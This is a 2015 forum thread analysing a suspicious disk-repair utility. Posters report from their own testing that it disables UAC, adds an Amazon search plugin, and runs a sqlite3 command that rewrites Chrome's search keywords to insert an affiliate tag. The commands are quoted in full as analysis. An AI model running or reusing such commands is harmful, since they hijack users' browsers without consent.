Easy Disk Drive Repair - what does it do?

Discussion in 'backup, imaging & disk mgmt' started by Callender, Jan 10, 2015.

  1. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
  2. TheRollbackFrog

    TheRollbackFrog Registered Member

    Joined:
    Mar 1, 2011
    Posts:
    3,051
    Location:
    The Pond - USA
    Just a guess here... it scans HDD sectors and when it finds an error, it re3pairs it. Most of these tool types do nothing more than scan the surface of your hard disk looking for errors during the read operation (soft read errors). When it detects one, it continues to read that sector until it gets the data without error, then does nothing more that re-write that data back to the original sector. Windows may normally not make that error available to you as it has its own read error count to go through before it starts shouting, and most of the time will read the block successfully before that count is reached. These tools use their own count (usually 1) then just re-write followed by a re-read. If the re-read is successful, it moves on.

    Since there's little published documentation and no real "publisher" identified... personally, I wouldn't touch it.
     
  3. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
    Thanks very much for your response. It seems to make perfect sense and reading through the available information once more I notice that "sector recovery" is mentioned.
     
  4. Creativemark

    Creativemark Registered Member

    Joined:
    Jan 17, 2015
    Posts:
    4
    What this does for me is, amongst other things:

    - turn off UAC
    - create a file C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\amazondotcom.xml
    - launch: "C:\Windows\System32\sqlite3.exe" "C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Default\Web Data" "update keywords set url = url || '&tag=chrome20-20' where url like '%amazon%' and url not like '%&tag=chrome20-20';"

    Interesting. I'll look some more.
     
  5. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
    That is indeed interesting. I've just uninstalled the program and checked for and deleted:

    *\searchplugins\amazondotcom.xml
    C:\Windows\System32\sqlite3.exe

    Reinstalled and there's still no sign of *\searchplugins\amazondotcom.xml

    C:\Windows\System32\sqlite3.exe does get created but does not launch.

    Two things to note: I have Cyberfox installed and Mozilla FF Portable but not the regular FF.

    *\searchplugins\amazondotcom.xml exists in Cyberfox and FF Portable by default.

    I don't have Chrome installed.
     
  6. Creativemark

    Creativemark Registered Member

    Joined:
    Jan 17, 2015
    Posts:
    4
    I think there's some logic here where it doesn't necessarily create the Amazon*xml first time. Not figured it out yet. The SQLITE3 command is more definitive, it's mostly visible in the EXE and can be fully seen if you check the program's RAM when it's running (Process Hacker > Memory > Strings, say), plus Process Monitor shows it being executed.

    Other red flags: the program claims 5 star awards it doesn't have, to be around since 2009 and have had a million+ downloads when its domain was registered last month, and to be run by guys who don't exist (in connection with the company, anyway). Also it's written in VB6, claims it can lock and fix a drive while Windows is using it, and if you reset after it's "fixed" one set of "errors", it finds another load next time.

    Oh, specific differences between you and me: I have Chrome and regular FF installed, not Cyberfox or FF Portable.
     
  7. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
    Just checked again using another method and I find the following in ProcessLasso's log:

    cmd.exe,[ERROR: missing string],Parent easydiskdriverepair.exe (2616), PATH: C:\Windows\SysWOW64\cmd.exe,"C:\Windows\system32\cmd.exe" /c reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f "*chrome*" /d > c:\windows\temp.txt

    So my understanding is limited but it's searching that key for "chrome" and creating a text file?

    c:\windows\temp.txt doesn't actually exist or get created on my machine. Also I don't see any further "errors" detected after running more scans.

    I've got Process Monitor and Process Hacker installed so I'll take a look although I might not understand exactly what I see!
     
  8. Creativemark

    Creativemark Registered Member

    Joined:
    Jan 17, 2015
    Posts:
    4
    Yes, that's using the command line reg tool to check for Chrome being launched at startup and redirecting that line - if there is one - to a file. Not sure why they do it that way... Maybe it's less likely to be detected as malicious because it's a trusted application checking the key?

    You don't have Chrome installed, so there won't be any reference and so the file won't be created.

    BTW, hopefully you're running this in a virtual machine/ somewhere safe or unimportant? Make sure you keep restoring your UAC settings after running it (Control Panel > Search UAC > Change User Account Control Settings > Default) and keep in mind that it launches itself at Startup, too. And Uninstall leaves the executable behind. Delete it manually if you're getting rid of it, or rename and copy it somewhere else for further study.
     
  9. Callender

    Callender Registered Member

    Joined:
    Jan 9, 2015
    Posts:
    66
    Location:
    London UK
    Good advice. I'd already uninstalled it a few times and reinstalled. The install is monitored by CPM and I check for leftover folders/ files and registry entries once it's been uninstalled. I'm not using a VM but always have several clean system image backups handy. I don't get that drive locking claim either!

    As for UAC settings - they're disabled and VoodooShield Pro replaces UAC.
     
  10. Creativemark

    Creativemark Registered Member

    Joined:
    Jan 17, 2015
    Posts:
    4
    Apologies, should have guessed no-one here would need security advice from me. :) (Although really I just wanted to say it explicitly, because this is doing some strange things.)
     
  11. Keatah

    Keatah Registered Member

    Joined:
    Jan 13, 2011
    Posts:
    853
    Programs like these force the disk to read and read and read a suspect sector till it thinks it gets it right. Eventually the firmware gives up and goes with what it thinks is correct. It reallocates the bad sector to one from the spare (or over provision) space. And voila!! Your disk no longer gives errors. Every sector reads error free again. The only question is what data..?

    The repaired sector may or may not be correct. So you must verify the file that was making use of that "repaired" sector. The guessing algorithm is part of the disk's firmware. Not the program. And it is not accurate all the time. It CANNOT recreate data that is not there to begin with.

    This program is like SpinRite and HDDRegenerator and DRevitalise. They simply trigger the HDD firmware to do a relocate, disregarding the existing data. This often makes a file readable again, but a couple of bytes will not be correct. See for yourself! Next time you encounter the situation, compare the recovered file against a good backup. CRC won't match. Never, ever, ever..

    ADDED: As with most maintenance software it is important to understand exactly what is and what is not being done. Data recovery is no exception. And that is a problem here.

    I'd hate for someone to run this, have it interpolate bad sectors, and call the file good. Then go and rely on tha data for a project. Ouch.. Just because it reads from the disk doesn't mean valid data is being read.
     
    Last edited: Jan 21, 2015
Loading...